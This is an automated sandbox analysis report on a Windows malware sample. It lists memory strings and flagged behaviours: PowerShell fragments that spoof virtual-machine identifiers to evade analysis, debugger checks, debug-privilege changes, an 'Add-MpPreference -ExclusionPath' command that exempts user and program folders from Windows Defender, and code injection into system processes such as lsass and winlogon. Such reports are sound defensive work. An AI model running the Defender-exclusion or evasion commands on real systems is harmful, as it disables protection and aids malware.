Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: svchost.exe, 00000011.00000003.1844293495.000001D559C7F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: lsass.exe, 00000008.00000000.1747335581.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2981325405.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2960919454.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000009.00000000.1753411970.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000000.1787229019.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2959653113.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.1789041841.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.2959031284.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.1799203992.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2971480214.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000009.00000000.1753452137.000002A66062A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000011.00000002.2984001454.000001D558F62000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000011.00000000.1816159694.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2963751898.000001D55862B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000011.00000003.1840991090.000001D559394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000011.00000000.1816191216.000001D558643000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmcitpA
Source: svchost.exe, 00000009.00000003.1981446312.000002A660660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000000D.00000002.2956193714.000002295CE00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000011.00000000.1818211836.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))

Source: C:\Windows\System32\dialer.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00000225DC647E70

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB314E4 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

4_2_00007FF78AB314E4

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC647E70
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC64B50C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC6A7E70
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC6AB50C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00000202C0AE7E70
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00000202C0AEB50C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661307E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000002A661307E70
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000002A66130B50C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE297E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_000002BAAE297E70
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_000002BAAE29B50C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0000026A879CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0000026A879C7E70
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000179537AB50C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000179537A7E70
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000017953D4B50C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000017953D47E70
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D567E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_000002295D567E70
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_000002295D56B50C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0000025306E67E70
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0000025306E6B50C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001845B3B7E70
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001845B3BB50C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_000001ADECD4B50C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_000001ADECD47E70
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_000001D55907B50C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559077E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_000001D559077E70
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00000241A9EAB50C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00000241A9EA7E70
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000002152C3EB50C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3E7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000002152C3E7E70
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73197E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001CD73197E70
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001CD7319B50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E89B50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E897E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E897E70
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E8FB50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8F7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E8F7E70
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0000021B47B37E70
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0000021B47B3B50C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAE260000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAED80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87F40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 179537D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25306E90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADECD70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D5590A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9ED0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD731C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E8C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B47B60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20870090000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17184290000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3FA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
